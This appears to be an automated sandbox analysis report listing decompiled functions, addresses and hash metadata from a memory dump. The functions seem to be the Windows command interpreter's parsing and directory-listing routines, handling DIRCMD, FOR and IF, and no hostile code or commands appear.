                                0x4a55234c
                                0x4a552354
                                0x4a552354
                                0x4a552355
                                0x4a55235c
                                0x4a552361
                                0x4a552363
                                0x4a55236b
                                0x4a55236c
                                0x4a552372
                                0x4a552378
                                0x4a552378
                                0x4a55237e
                                0x00000000
                                0x00000000
                                0x4a552388
                                0x4a5523aa
                                0x4a5523aa
                                0x4a5523b8
                                0x4a5523da
                                0x4a5523e1
                                0x4a5523e8
                                0x4a5530d7
                                0x4a5530dd
                                0x4a5530e5
                                0x4a5530e9
                                0x4a5530ec
                                0x4a5530f2
                                0x00000000
                                0x00000000
                                0x4a5530f8
                                0x4a553105
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5530f8
                                0x4a55310c
                                0x4a55310c
                                0x4a5523ee
                                0x4a5523ee
                                0x4a5523f5
                                0x4a5523f6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5523fc
                                0x4a5523fc
                                0x4a552402
                                0x4a55434d
                                0x00000000
                                0x00000000
                                0x4a554353
                                0x4a552408
                                0x4a55240b
                                0x4a552423
                                0x4a552426
                                0x4a5695c0
                                0x4a556d0b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556d11
                                0x4a55242c
                                0x4a55242c
                                0x4a552432
                                0x4a554412
                                0x4a554400
                                0x4a5695d4
                                0x4a556d18
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556d1e
                                0x4a554406
                                0x4a554407
                                0x4a554408
                                0x4a55440e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554410
                                0x4a55443d
                                0x00000000
                                0x00000000
                                0x4a554449
                                0x4a554453
                                0x4a554453
                                0x4a55445a
                                0x00000000
                                0x4a55445a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55240b
                                0x4a552388
                                0x4a552451
                                0x4a552456
                                0x4a552457
                                0x4a552458
                                0x4a552464
                                0x4a552464
                                0x4a55211c
                                0x4a552120
                                0x4a5544f8
                                0x4a5544fb
                                0x4a55d9b1
                                0x4a55d9b1
                                0x4a554507
                                0x4a55450e
                                0x4a554511
                                0x4a552137
                                0x4a552137
                                0x00000000
                                0x4a552137
                                0x4a55212a
                                0x4a5695e7
                                0x4a5695e7
                                0x4a552130
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: iswspace
                                • String ID: =,;
                                • API String ID: 2389812497-1539845467
                                • Opcode ID: e91353745190b996ad2c3a3ecea510bc9e02e631c9c347103014f55e394da973
                                • Instruction ID: 37a186378705e3b4c6cc892a023eb5e9930ef65964437c0a7ddcf19855473130
                                • Opcode Fuzzy Hash: e91353745190b996ad2c3a3ecea510bc9e02e631c9c347103014f55e394da973
                                • Instruction Fuzzy Hash: E6815C7591126ADBDB609F94EA007AEBAF4FF04314F01449BE889BB15CE7748AC5CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A555B4D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 195COMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E4A555B4D(void* __ebx, intOrPtr __ecx, void* __edi, signed short* _a4) {
				WCHAR* _v8;
				void* __esi;
				void* __ebp;
				signed int _t24;
				WCHAR* _t25;
				void* _t26;
				signed short* _t27;
				signed int* _t31;
				signed int* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int* _t37;
				signed int* _t40;
				intOrPtr* _t47;
				signed int* _t50;
				signed int* _t51;
				signed int* _t52;
				char* _t56;
				signed short* _t59;
				signed int _t60;
				signed int* _t62;
				signed int* _t63;
				signed int* _t64;
				signed int* _t65;
				signed int* _t66;
				signed int _t67;
				void* _t68;
				intOrPtr _t69;
				signed int* _t70;
				signed short* _t73;
				signed int* _t75;
				void* _t78;

				_t68 = __edi;
				_t49 = __ecx;
				_push(__ecx);
				_t73 = _a4;
				if(_t73 == 0) {
					L18:
					_t24 = 1;
					L13:
					return _t24;
				}
				_t25 = E4A551896(0x208);
				_v8 = _t25;
				if(_t25 == 0) {
					goto L18;
				}
				_push(__ebx);
				_t26 = E4A5518EB(_t73, 0x5e);
				_t47 = 2;
				_t84 = _t26;
				if(_t26 != 0) {
					_t27 = _t73;
					_t59 =  &(_t27[1]);
					do {
						_t50 =  *_t27;
						_t27 = _t27 + _t47;
						__eflags = _t50;
					} while (_t50 != 0);
					_t31 = E4A551896(2 + (_t27 - _t59 >> 1) * 4);
					__eflags = _t31;
					if(_t31 == 0) {
						L29:
						_t24 = 1;
						goto L12;
					}
					_t51 = _t31;
					while(1) {
						__eflags =  *_t73;
						if( *_t73 == 0) {
							break;
						}
						_t60 =  *_t73 & 0x0000ffff;
						 *_t51 = _t60;
						_t51 = _t51 + _t47;
						_t73 = _t73 + _t47;
						__eflags = _t60 - 0x5e;
						if(_t60 == 0x5e) {
							_t67 = 0x5e;
							 *_t51 = _t67;
							_t51 = _t51 + _t47;
							__eflags = _t51;
						}
					}
					__eflags = 0;
					 *_t51 = 0;
					_t52 = _t31;
					_t13 =  &(_t52[0]); // 0x2
					_t75 = _t13;
					do {
						_t62 =  *_t52;
						_t52 = _t52 + _t47;
						__eflags = _t62;
					} while (_t62 != 0);
					_t49 = (_t52 - _t75 >> 1) + (_t52 - _t75 >> 1) + 2;
					_t33 = E4A552536(_t31, (_t52 - _t75 >> 1) + (_t52 - _t75 >> 1) + 2);
					_a4 = _t33;
					__eflags = _t33;
					if(__eflags != 0) {
						goto L4;
					}
					goto L29;
				} else {
					_a4 = _t73;
					L4:
					_t34 =  *0x4a574104; // 0x0
					_push(_t68);
					 *0x4a5741d4 = 1;
					_t35 = E4A551BD2(_t68, _t84, 1, _a4, _t34);
					 *0x4a5741d4 =  *0x4a5741d4 & 0x00000000;
					_t69 = _t35;
					if(_t69 == 1) {
						_t70 = E4A5519D6(_a4);
						__eflags = _t70;
						if(_t70 != 0) {
							__imp___wcsupr(_t70);
							_t56 = 0x4a564be0;
							_t37 = _t70;
							_t78 = 4;
							while(1) {
								_t63 =  *_t37;
								__eflags = _t63 -  *_t56;
								if(_t63 !=  *_t56) {
									break;
								}
								__eflags = _t63;
								if(_t63 == 0) {
									L37:
									_t37 = 0;
									L39:
									__eflags = _t37;
									if(_t37 == 0) {
										L48:
										E4A556D44(_t56, 0x234a, 1, _a4);
										L51:
										_t24 = 1;
										L11:
										L12:
										goto L13;
									}
									_t56 = L" FOR";
									_t40 = _t70;
									while(1) {
										_t64 =  *_t40;
										__eflags = _t64 -  *_t56;
										if(_t64 !=  *_t56) {
											break;
										}
										__eflags = _t64;
										if(_t64 == 0) {
											L45:
											_t40 = 0;
											L47:
											__eflags = _t40;
											if(_t40 != 0) {
												goto L51;
											}
											goto L48;
										}
										_t65 = _t40[0];
										__eflags = _t65 - _t56[2];
										if(_t65 != _t56[2]) {
											break;
										}
										_t40 = _t40 + _t78;
										_t56 =  &(_t56[_t78]);
										__eflags = _t65;
										if(_t65 != 0) {
											continue;
										}
										goto L45;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L47;
								}
								_t66 = _t37[0];
								__eflags = _t66 - _t56[2];
								if(_t66 != _t56[2]) {
									break;
								}
								_t37 = _t37 + _t78;
								_t56 =  &(_t56[_t78]);
								__eflags = _t66;
								if(_t66 != 0) {
									continue;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L39;
						}
						_t24 = 1;
						goto L11;
					}
					if(_t69 == 0xffffffff) {
						_t24 = 0;
						goto L11;
					}
					if( *0x4a574081 == 0 ||  *((short*)( *((intOrPtr*)(_t69 + 0x38)))) != 0x3a) {
						__eflags = E4A5518EB( *((intOrPtr*)(_t69 + 0x38)), 0x2a);
						if(__eflags != 0) {
							L17:
							_t24 = E4A55216E(_t47, _t69, 0x104, __eflags, _t69);
							goto L11;
						}
						__eflags = E4A5518EB( *((intOrPtr*)(_t69 + 0x38)), 0x3f);
						if(__eflags != 0) {
							goto L17;
						}
						__eflags = E4A553370(_t47, _t69, _v8, 0x104) - _t47;
						if(__eflags == 0) {
							goto L9;
						}
						goto L17;
					} else {
						if( *0x4a5740b4 == 0) {
							_push(0);
							_push(0x400023aa);
							E4A556D44(_t49);
							goto L51;
						}
						L9:
						_t24 = E4A55566F(_t49, 0x104, _t69, _v8, 0x104, 1);
						if(_t24 == 0) {
							_t24 =  *0x4a574188; // 0x0
						}
						goto L11;
					}
				}
			}



































                                0x4a555b4d
                                0x4a555b4d
                                0x4a555b52
                                0x4a555b54
                                0x4a555b59
                                0x4a555c4e
                                0x4a555c50
                                0x4a555bf9
                                0x4a555bfb
                                0x4a555bfb
                                0x4a555b64
                                0x4a555b69
                                0x4a555b6e
                                0x00000000
                                0x00000000
                                0x4a555b74
                                0x4a555b78
                                0x4a555b7f
                                0x4a555b80
                                0x4a555b82
                                0x4a564a9d
                                0x4a564a9f
                                0x4a564aa2
                                0x4a564aa2
                                0x4a564aa5
                                0x4a564aa7
                                0x4a564aa7
                                0x4a564ab8
                                0x4a564abd
                                0x4a564abf
                                0x4a564b11
                                0x4a564b13
                                0x00000000
                                0x4a564b13
                                0x4a564ac1
                                0x4a564add
                                0x4a564add
                                0x4a564ae1
                                0x00000000
                                0x00000000
                                0x4a564ac5
                                0x4a564ac8
                                0x4a564acb
                                0x4a564acd
                                0x4a564acf
                                0x4a564ad3
                                0x4a564ad7
                                0x4a564ad8
                                0x4a564adb
                                0x4a564adb
                                0x4a564adb
                                0x4a564ad3
                                0x4a564ae3
                                0x4a564ae5
                                0x4a564ae8
                                0x4a564aea
                                0x4a564aea
                                0x4a564aed
                                0x4a564aed
                                0x4a564af0
                                0x4a564af2
                                0x4a564af2
                                0x4a564afb
                                0x4a564b01
                                0x4a564b06
                                0x4a564b09
                                0x4a564b0b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a555b88
                                0x4a555b88
                                0x4a555b8b
                                0x4a555b8b
                                0x4a555b90
                                0x4a555b99
                                0x4a555b9f
                                0x4a555ba4
                                0x4a555bab
                                0x4a555baf
                                0x4a564b21
                                0x4a564b23
                                0x4a564b25
                                0x4a564b2f
                                0x4a564b38
                                0x4a564b3d
                                0x4a564b3f
                                0x4a564b40
                                0x4a564b40
                                0x4a564b43
                                0x4a564b46
                                0x00000000
                                0x00000000
                                0x4a564b48
                                0x4a564b4b
                                0x4a564b60
                                0x4a564b60
                                0x4a564b69
                                0x4a564b69
                                0x4a564b6b
                                0x4a564ba1
                                0x4a564bab
                                0x4a564bca
                                0x4a564bcc
                                0x4a555bf7
                                0x4a555bf8
                                0x00000000
                                0x4a555bf8
                                0x4a564b6d
                                0x4a564b72
                                0x4a564b74
                                0x4a564b74
                                0x4a564b77
                                0x4a564b7a
                                0x00000000
                                0x00000000
                                0x4a564b7c
                                0x4a564b7f
                                0x4a564b94
                                0x4a564b94
                                0x4a564b9d
                                0x4a564b9d
                                0x4a564b9f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a564b9f
                                0x4a564b81
                                0x4a564b85
                                0x4a564b89
                                0x00000000
                                0x00000000
                                0x4a564b8b
                                0x4a564b8d
                                0x4a564b8f
                                0x4a564b92
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a564b92
                                0x4a564b98
                                0x4a564b9a
                                0x00000000
                                0x4a564b9a
                                0x4a564b4d
                                0x4a564b51
                                0x4a564b55
                                0x00000000
                                0x00000000
                                0x4a564b57
                                0x4a564b59
                                0x4a564b5b
                                0x4a564b5e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a564b5e
                                0x4a564b64
                                0x4a564b66
                                0x00000000
                                0x4a564b66
                                0x4a564b27
                                0x00000000
                                0x4a564b27
                                0x4a555bb8
                                0x4a564bb5
                                0x00000000
                                0x4a564bb5
                                0x4a555bca
                                0x4a555c26
                                0x4a555c28
                                0x4a555c46
                                0x4a555c47
                                0x00000000
                                0x4a555c47
                                0x4a555c34
                                0x4a555c36
                                0x00000000
                                0x00000000
                                0x4a555c42
                                0x4a555c44
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a555bd5
                                0x4a555bdc
                                0x4a564bbc
                                0x4a564bbe
                                0x4a564bc3
                                0x00000000
                                0x4a564bc9
                                0x4a555be2
                                0x4a555be9
                                0x4a555bf0
                                0x4a555bf2
                                0x4a555bf2
                                0x00000000
                                0x4a555bf0
                                0x4a555bca

                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocProcess_setjmp3wcschr
                                • String ID: FOR$ IF
                                • API String ID: 717958327-2924197646
                                • Opcode ID: d833e10921d1dd43151e55935b42cfe4356c0edbc0bc139afbdd477826ecbf9a
                                • Instruction ID: e5f5a8674c9511821f19fd455f955fd54626ab279c8bbe8040a5ad8d7715e0c6
                                • Opcode Fuzzy Hash: d833e10921d1dd43151e55935b42cfe4356c0edbc0bc139afbdd477826ecbf9a
                                • Instruction Fuzzy Hash: 10512831611112B6EB156F34CF40BAA3BB6EF99764F050526E80ADF1ACF772C981C390
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A571877, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167COMMON
                                Download Yara Rule
                                C-Code - Quality: 92%
                                			E4A571877(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t57;
				intOrPtr _t58;
				signed int _t66;
				signed int _t68;
				intOrPtr _t70;
				intOrPtr* _t71;
				signed int _t74;
				intOrPtr _t75;
				signed int _t80;
				short* _t82;
				long _t84;
				signed int _t86;
				wchar_t* _t87;
				signed int _t91;
				signed int _t95;
				short _t96;
				signed int _t99;
				signed int _t100;
				void* _t101;
				signed int _t104;
				int _t105;
				intOrPtr _t106;
				signed int _t109;
				signed int _t110;
				void* _t111;

				_t91 = __ebx;
				_push(0x20);
				_push(0x4a571a88);
				E4A55264A(__ebx, __edi, __esi);
				_t57 = E4A551896(0x4000);
				 *(_t111 - 0x20) = _t57;
				_t99 = 0;
				if(_t57 != 0) {
					 *((intOrPtr*)(_t111 - 4)) = 0;
					__eflags =  *(_t111 + 0x1c);
					if( *(_t111 + 0x1c) != 0) {
						L4:
						 *(_t111 - 0x24) = _t99;
						_t109 = 0;
						 *(_t111 - 0x28) = 0;
						_t92 = _t91 | 0xffffffff;
						 *(_t111 - 0x2c) = _t92;
						 *(_t111 - 0x1c) = _t99;
						_t104 = 0;
						__eflags = 0;
						while(1) {
							 *(_t111 - 0x30) = _t104;
							_t58 =  *((intOrPtr*)(_t111 + 0x10));
							__eflags = _t104 - _t58;
							if(_t104 >= _t58) {
								break;
							}
							_t84 =  *( *((intOrPtr*)(_t111 + 8)) + _t104 * 2) & 0x0000ffff;
							__eflags = _t84 - 0x2f;
							if(_t84 != 0x2f) {
								__eflags = _t84 - 0x22;
								if(_t84 != 0x22) {
									__eflags =  *(_t111 - 0x24) - _t99;
									if( *(_t111 - 0x24) != _t99) {
										L16:
										_t86 =  *( *((intOrPtr*)(_t111 + 8)) + _t104 * 2) & 0x0000ffff;
										__eflags = _t86 - 0x3a;
										if(_t86 == 0x3a) {
											L21:
											_t31 = _t104 + 1; // 0x1
											_t92 = _t31;
											 *(_t111 - 0x2c) = _t92;
											goto L22;
										}
										__eflags = _t86 - 0x5c;
										if(_t86 == 0x5c) {
											goto L21;
										}
										__eflags = _t86 - 0x2a;
										if(_t86 == 0x2a) {
											L20:
											 *(_t111 - 0x1c) = 1;
											goto L23;
										}
										__eflags = _t86 - 0x3f;
										if(_t86 != 0x3f) {
											goto L23;
										}
										goto L20;
									}
									_t87 = wcschr(L" &()[]{}^=;!%\'+,`~", _t84);
									__eflags = _t87;
									if(_t87 == 0) {
										_t99 = 0;
										__eflags = 0;
										goto L16;
									}
									_t23 = _t104 + 1; // 0x1
									_t109 = _t23;
									 *(_t111 - 0x28) = _t109;
									 *(_t111 - 0x1c) =  *(_t111 - 0x1c) & 0x00000000;
									_t99 = 0;
									goto L23;
								}
								__eflags =  *(_t111 - 0x24) - _t99;
								if( *(_t111 - 0x24) == _t99) {
									_t109 = _t104;
									 *(_t111 - 0x28) = _t109;
								}
								__eflags =  *(_t111 - 0x24) - _t99;
								 *(_t111 - 0x24) = 0 |  *(_t111 - 0x24) == _t99;
								goto L23;
							} else {
								_t14 = _t104 + 1; // 0x1
								_t109 = _t14;
								 *(_t111 - 0x28) = _t109;
								L22:
								 *(_t111 - 0x1c) = _t99;
								L23:
								_t104 = _t104 + 1;
								continue;
							}
						}
						__eflags = _t92 - 0xffffffff;
						if(_t92 == 0xffffffff) {
							L26:
							_t92 = _t109;
							 *(_t111 - 0x2c) = _t109;
							L27:
							_t105 = _t58 - _t109 + _t58 - _t109;
							memcpy( *(_t111 - 0x20),  *((intOrPtr*)(_t111 + 8)) + _t109 * 2, _t105);
							__eflags =  *(_t111 - 0x1c);
							if( *(_t111 - 0x1c) != 0) {
								__eflags = 0;
								_t94 =  *(_t111 - 0x20);
								 *((short*)( *(_t111 - 0x20) + _t105)) = 0;
							} else {
								_t82 =  *(_t111 - 0x20) + _t105;
								_t96 = 0x2a;
								 *_t82 = _t96;
								_t94 = 0;
								 *((short*)(_t82 + 2)) = 0;
							}
							_t106 =  *((intOrPtr*)(_t111 + 0x18));
							_t66 = E4A5714FD(_t94, _t99,  *(_t111 - 0x20), 0x2000, _t106, _t92 - _t109);
							 *0x4a574150 = _t66;
							 *0x4a57414c = _t66;
							_t95 = _t109;
							 *0x4a574144 = _t95;
							 *0x4a574148 = _t106;
							_t99 = 0;
							L32:
							__eflags = _t66 - _t99;
							if(_t66 == _t99) {
								L43:
								 *((intOrPtr*)(_t111 - 4)) = 0xfffffffe;
								E4A571A79();
								_t68 =  *0x4a574150; // 0x0
								goto L44;
							}
							__eflags =  *((intOrPtr*)(_t111 + 0x14)) - _t99;
							if( *((intOrPtr*)(_t111 + 0x14)) == _t99) {
								 *0x4a57414c =  *0x4a57414c - 1;
								__eflags =  *0x4a57414c;
								if( *0x4a57414c < 0) {
									_t80 = _t66 - 1;
									__eflags = _t80;
									 *0x4a57414c = _t80;
								}
							} else {
								 *0x4a57414c =  *0x4a57414c + 1;
								__eflags =  *0x4a57414c - _t66; // 0x0
								if(__eflags >= 0) {
									 *0x4a57414c = _t99;
								}
							}
							_t70 =  *0x4a5906c0; // 0x0
							_t100 =  *0x4a57414c; // 0x0
							_t107 =  *((intOrPtr*)(_t70 + _t100 * 4));
							_t71 =  *((intOrPtr*)(_t70 + _t100 * 4));
							_t49 = _t71 + 2; // 0x2
							_t101 = _t49;
							do {
								_t110 =  *_t71;
								_t71 = _t71 + 2;
								__eflags = _t110;
							} while (_t110 != 0);
							_t74 = _t71 - _t101 >> 1;
							_t75 =  *((intOrPtr*)(_t111 + 0xc));
							__eflags = _t74 + _t95 - _t75;
							if(_t74 + _t95 < _t75) {
								__eflags = _t75 - _t95;
								E4A55185A( *((intOrPtr*)(_t111 + 8)) + _t95 * 2, _t75 - _t95, _t107);
							} else {
								 *0x4a574150 =  *0x4a574150 & 0x00000000;
							}
							goto L43;
						}
						__eflags = _t92 - _t109;
						if(_t92 >= _t109) {
							goto L27;
						}
						goto L26;
					}
					__eflags =  *0x4a574148 -  *((intOrPtr*)(_t111 + 0x18)); // 0x0
					if(__eflags == 0) {
						_t66 =  *0x4a574150; // 0x0
						_t95 =  *0x4a574144; // 0x0
						goto L32;
					}
					goto L4;
				} else {
					_t68 = 0;
					L44:
					return E4A5513B6(_t68);
				}
			}




























                                0x4a571877
                                0x4a571877
                                0x4a571879
                                0x4a57187e
                                0x4a571888
                                0x4a57188d
                                0x4a571890
                                0x4a571894
                                0x4a57189d
                                0x4a5718a0
                                0x4a5718a3
                                0x4a5718b4
                                0x4a5718b4
                                0x4a5718b7
                                0x4a5718b9
                                0x4a5718bc
                                0x4a5718bf
                                0x4a5718c2
                                0x4a5718c5
                                0x4a5718c5
                                0x4a5718c7
                                0x4a5718c7
                                0x4a5718ca
                                0x4a5718cd
                                0x4a5718cf
                                0x00000000
                                0x00000000
                                0x4a5718d8
                                0x4a5718dc
                                0x4a5718e0
                                0x4a5718ea
                                0x4a5718ee
                                0x4a571907
                                0x4a57190a
                                0x4a57192e
                                0x4a571931
                                0x4a571935
                                0x4a571939
                                0x4a571956
                                0x4a571956
                                0x4a571956
                                0x4a571959
                                0x00000000
                                0x4a571959
                                0x4a57193b
                                0x4a57193f
                                0x00000000
                                0x00000000
                                0x4a571941
                                0x4a571945
                                0x4a57194d
                                0x4a57194d
                                0x00000000
                                0x4a57194d
                                0x4a571947
                                0x4a57194b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a57194b
                                0x4a571912
                                0x4a57191a
                                0x4a57191c
                                0x4a57192c
                                0x4a57192c
                                0x00000000
                                0x4a57192c
                                0x4a57191e
                                0x4a57191e
                                0x4a571921
                                0x4a571924
                                0x4a571928
                                0x00000000
                                0x4a571928
                                0x4a5718f0
                                0x4a5718f3
                                0x4a5718f5
                                0x4a5718f7
                                0x4a5718f7
                                0x4a5718fc
                                0x4a571902
                                0x00000000
                                0x4a5718e2
                                0x4a5718e2
                                0x4a5718e2
                                0x4a5718e5
                                0x4a57195c
                                0x4a57195c
                                0x4a57195f
                                0x4a57195f
                                0x00000000
                                0x4a57195f
                                0x4a5718e0
                                0x4a571965
                                0x4a571968
                                0x4a57196e
                                0x4a57196e
                                0x4a571970
                                0x4a571973
                                0x4a571977
                                0x4a571984
                                0x4a57198c
                                0x4a571990
                                0x4a5719a5
                                0x4a5719a7
                                0x4a5719aa
                                0x4a571992
                                0x4a571995
                                0x4a571999
                                0x4a57199a
                                0x4a57199d
                                0x4a57199f
                                0x4a57199f
                                0x4a5719b1
                                0x4a5719be
                                0x4a5719c3
                                0x4a5719c8
                                0x4a5719cd
                                0x4a5719cf
                                0x4a5719d5
                                0x4a5719db
                                0x4a5719ea
                                0x4a5719ea
                                0x4a5719ec
                                0x4a571a5b
                                0x4a571a5b
                                0x4a571a62
                                0x4a571a67
                                0x00000000
                                0x4a571a67
                                0x4a5719ee
                                0x4a5719f1
                                0x4a571a09
                                0x4a571a09
                                0x4a571a0f
                                0x4a571a11
                                0x4a571a11
                                0x4a571a12
                                0x4a571a12
                                0x4a5719f3
                                0x4a5719f3
                                0x4a5719f9
                                0x4a5719ff
                                0x4a571a01
                                0x4a571a01
                                0x4a5719ff
                                0x4a571a17
                                0x4a571a1c
                                0x4a571a22
                                0x4a571a25
                                0x4a571a27
                                0x4a571a27
                                0x4a571a2a
                                0x4a571a2a
                                0x4a571a2e
                                0x4a571a2f
                                0x4a571a2f
                                0x4a571a36
                                0x4a571a3b
                                0x4a571a3e
                                0x4a571a40
                                0x4a571a4c
                                0x4a571a56
                                0x4a571a42
                                0x4a571a42
                                0x4a571a42
                                0x00000000
                                0x4a571a40
                                0x4a57196a
                                0x4a57196c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a57196c
                                0x4a5718a8
                                0x4a5718ae
                                0x4a5719df
                                0x4a5719e4
                                0x00000000
                                0x4a5719e4
                                0x00000000
                                0x4a571896
                                0x4a571896
                                0x4a571a6c
                                0x4a571a71
                                0x4a571a71

                                APIs
                                  • Part of subcall function 4A551896: GetProcessHeap.KERNEL32(00000008,4A5525C0,4A5525BB,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C), ref: 4A5518A9
                                  • Part of subcall function 4A551896: HeapAlloc.KERNEL32(00000000,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C,?,4A556CE6), ref: 4A5518B0
                                • memcpy.MSVCRT ref: 4A571984
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocProcessmemcpy
                                • String ID: &()[]{}^=;!%'+,`~
                                • API String ID: 4164033339-381716982
                                • Opcode ID: b3c06ca55819ab4fb55509de170d4b04c87e68b87c29d6c361d5b9191c8007d7
                                • Instruction ID: d7e88eb167aa2a25f91cd85b72460e614b5c2943648c8b915ffe061fe3235a81
                                • Opcode Fuzzy Hash: b3c06ca55819ab4fb55509de170d4b04c87e68b87c29d6c361d5b9191c8007d7
                                • Instruction Fuzzy Hash: 0D5190B9D12206DFDB10EFA9C640A99BBB6FF95320F11812AD414F7274E7B09942CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55AEEB, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E4A55AEEB(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				char _v532;
				short _v1056;
				intOrPtr _v1060;
				void* _v1072;
				char _v1076;
				char _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				char _v1100;
				void* _v1108;
				void* _v1112;
				short _v1114;
				short _v1116;
				void* _v1120;
				short _v1122;
				short _v1124;
				void* _v1128;
				short _v1130;
				short _v1132;
				void* _v1136;
				short _v1138;
				short _v1140;
				void* _v1144;
				short _v1146;
				short _v1148;
				void* _v1152;
				short _v1154;
				short _v1156;
				char _v1160;
				char _v1164;
				intOrPtr _v1168;
				signed int _v1172;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				intOrPtr _t65;
				long _t67;
				void* _t72;
				void* _t86;
				intOrPtr _t90;
				intOrPtr _t100;
				intOrPtr _t102;
				signed int _t103;

				_t90 = __edx;
				_t86 = __ecx;
				_t61 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t61 ^ _t103;
				_v1156 = 0;
				_v1154 = 0;
				_v1160 = 0;
				asm("stosd");
				_v1148 = 0;
				_v1146 = 0;
				asm("stosd");
				_v1140 = 0;
				_v1138 = 0;
				asm("stosd");
				_v1132 = 0;
				_v1130 = 0;
				asm("stosd");
				_v1124 = 0;
				_v1122 = 0;
				_t100 = _a4;
				asm("stosd");
				_v1116 = 0;
				_v1114 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v1096 = 0;
				_v1092 = 0;
				_v1088 = 0;
				_v1084 = 0;
				_v1076 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t65 =  *0x4a574104; // 0x0
				_v1060 = _t65;
				_v1168 = 6;
				_v1164 = 0;
				_v1172 = 0x8000;
				_v1100 = 0;
				_v1080 = 0;
				_t67 = GetEnvironmentVariableW(L"DIRCMD",  &_v1056, 0x106);
				_t104 = _t67;
				if(_t67 != 0) {
					__eflags = E4A55B210(_t90, __eflags,  &_v1056,  &_v1172) - 1;
					if(__eflags == 0) {
						_push(0);
						E4A556D44(_t86);
						_t86 = 0x2377;
					}
				}
				_t72 = E4A55B210(_t90, _t104, _t100,  &_v1172);
				_t102 = 1;
				if(_t72 != 1) {
					if((_v1172 & 0x00000040) != 0) {
						_v1172 = _v1172 & 0xfffb79fb;
					}
					if((_v1172 & 0x00000400) != 0) {
						_v1172 = _v1172 & 0xfffffdbb;
					}
					E4A552C56(0, _t90, 0x106,  &_v532, 0x106, 0);
					_t109 = _v1100;
					if(_v1100 == 0) {
						_v1100 = _t102;
						_v1096 = E4A5545D8( &_v532);
						_v1088 = 1;
						_v1092 = 0;
						_v1084 = 0;
					}
					_t102 = E4A55ADF8(0, _t86, _t90, _t109,  &_v1172);
					E4A55185A(0x4a575260, 0x104,  &_v532);
					E4A551911(_v1060);
				}
				return E4A5513A9(_t102, 0, _v8 ^ _t103, _t90, 0x106, _t102);
			}


















































                                0x4a55aeeb
                                0x4a55aeeb
                                0x4a55aef6
                                0x4a55aefd
                                0x4a55af02
                                0x4a55af09
                                0x4a55af13
                                0x4a55af21
                                0x4a55af22
                                0x4a55af29
                                0x4a55af36
                                0x4a55af37
                                0x4a55af3e
                                0x4a55af4b
                                0x4a55af4c
                                0x4a55af53
                                0x4a55af60
                                0x4a55af61
                                0x4a55af68
                                0x4a55af6f
                                0x4a55af78
                                0x4a55af79
                                0x4a55af80
                                0x4a55af8d
                                0x4a55af94
                                0x4a55af95
                                0x4a55af98
                                0x4a55af9e
                                0x4a55afa4
                                0x4a55afaa
                                0x4a55afb0
                                0x4a55afbc
                                0x4a55afbd
                                0x4a55afbe
                                0x4a55afbf
                                0x4a55afc4
                                0x4a55afdc
                                0x4a55afe6
                                0x4a55afec
                                0x4a55aff6
                                0x4a55affc
                                0x4a55b002
                                0x4a55b008
                                0x4a55b00a
                                0x4a56a9a2
                                0x4a56a9a5
                                0x4a56a9ab
                                0x4a56a9b1
                                0x4a56a9b7
                                0x4a56a9b7
                                0x4a56a9a5
                                0x4a55b018
                                0x4a55b01f
                                0x4a55b022
                                0x4a55b02b
                                0x4a55b02d
                                0x4a55b02d
                                0x4a55b041
                                0x4a56a9bd
                                0x4a56a9bd
                                0x4a55b050
                                0x4a55b055
                                0x4a55b05b
                                0x4a56a9d3
                                0x4a56a9de
                                0x4a56a9e4
                                0x4a56a9eb
                                0x4a56a9f1
                                0x4a56a9f1
                                0x4a55b06d
                                0x4a55b080
                                0x4a55b08b
                                0x4a55b08b
                                0x4a55b0a0

                                APIs
